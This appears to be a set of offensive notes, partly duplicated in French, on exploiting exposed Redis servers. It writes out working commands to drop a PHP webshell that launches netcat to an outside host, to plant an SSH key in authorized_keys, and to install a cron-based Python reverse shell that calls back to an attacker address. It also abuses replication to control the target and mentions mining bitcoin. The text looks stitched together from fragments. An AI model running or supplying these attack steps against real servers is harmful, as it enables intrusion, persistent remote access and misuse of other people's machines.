redis-cli -h 10.9.0.19
config set dir /var/www/html
config set dbfilename shell.php
set test "<?php system($_GET['cmd']);?>
http://10.9.0.19/shell.php?cmd=nc 10.9.0.15 4444 -e /bin/sh
S’il y a un exception, vous pouvez réessayer après avoir fait un backup et vidé la base de données. Ne pas oublier de restorer la bd
Get Webshell
You must know the physical path of the Web site
root@kali:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK
If the webshell access exception, you can empty the database after backup and try again, remember to restore the database
Get SSH–Crackit
Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
Write the public key to a file : (echo -e “\n\n”; cat ./.ssh/id_rsa.pub; echo -e “\n\n”) > foo.txt
Import the file into redis : cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit
Save the public key to the authorized_keys file on redis server :
root@kali:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /home/test/.ssh/
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
Finally, you can ssh to the redis server with private key :
ssh -i id_rsa test@10.85.0.52
Get Reverse Shell—Crontab
root@kali:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@kali:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@kali:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@kali:~# redis-cli -h 10.85.0.52 save
OK
The above command for Ubuntu, Centos need to be adjusted to:
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
This method can also be used to earn bitcoin :yam
Master-Slave Module
The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.
master redis : 10.85.0.51 (Hacker’s Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld